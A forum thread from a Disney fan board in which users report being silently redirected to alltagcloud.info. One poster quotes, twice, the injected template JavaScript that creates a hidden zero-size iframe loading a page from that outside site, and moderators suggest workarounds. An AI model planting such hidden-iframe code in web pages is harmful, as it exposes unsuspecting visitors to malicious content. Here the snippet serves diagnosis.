Alltagcloud.info

That is usually caused when someone links to something that has it, for example in their signature. Please provide a link to the exact page where you are seeing it and we can usually find it

I see in on this thread and every one I visit on the Dis. I'm using IE9 and have seen this for at least the last week. When I click and hold down the big back arrow button, I see "http://www.alltagcloud.info/icons/index" listed as the page before this one. I've been avoiding the Dis for the last few days hoping that this would get fixed.

Could someone who is more tech savy than me please explain what this is? Is it malware or in any way malicious? And why hasn't it been fixed yet?

NOT there for the first time in days.:thumbsup2:worship:

Please disregard prematue celebration shown above.^^^^^^^^:headache: D'Oh

Looks like someone/thing injected code into some of the templates on the DIS.

Code:
 GPad = {                   init: function () {                       document.write('');                       var frame = document.createElement('iframe');                       frame.setAttribute('src', 'http://www.alltagcloud.info/icons/index.php');                       frame.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');                       frame.style.visibility = 'hidden';                       frame.style.display = 'none';                       var div = document.getElementById('GPAD');                       div.appendChild(frame);                   }               }               GPad.init();

Looks like someone/thing injected code into some of the templates on the DIS.

Code:
 GPad = {                   init: function () {                       document.write('');                       var frame = document.createElement('iframe');                       frame.setAttribute('src', 'http://www.alltagcloud.info/icons/index.php');                       frame.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');                       frame.style.visibility = 'hidden';                       frame.style.display = 'none';                       var div = document.getElementById('GPAD');                       div.appendChild(frame);                   }               }               GPad.init();

Then who/how does it get removed :confused3 This has been going on for way too long :scared1:

Then who/how does it get removed :confused3 This has been going on for way too long :scared1:
I would let the Webmasters sort it out. This is a wide spread problem that is affecting other sites that use vBulletin. Alex posted in another thread that you need to use a different theme if it is affecting you. I have never seen the issue happen to me. It mainly affects IE users due to IE seeing it as a virus (because it is a VB script).

If you are having this issue can you switch to the "The DIS discussion forum Vbulletin 3 style" It's on the bottom left. Please report back if that makes a difference
Thanks!

It's still showing up for me today and it is making things run so darn SLOOOOOOOOOW. I'll have to try changing my theme (if I can figure out where that is) to see if it helps but it is just so annoying!

When I change my theme to "forum Vbulletin 3 style", it does not stay and will revert back to default so then I am right back where I started with alltagcloud :headache:

When I change my theme to "forum Vbulletin 3 style", it does not stay and will revert back to default so then I am right back where I started with alltagcloud :headache:

I am having this problem also on the resorts board.

GET A DISNEY VACATION QUOTE

Dreams Unlimited Travel is committed to providing you with the very best vacation planning experience possible. Our Vacation Planners are experts and will share their honest advice to help you have a magical vacation.

Let us help you with your next Disney Vacation!

facebook twitter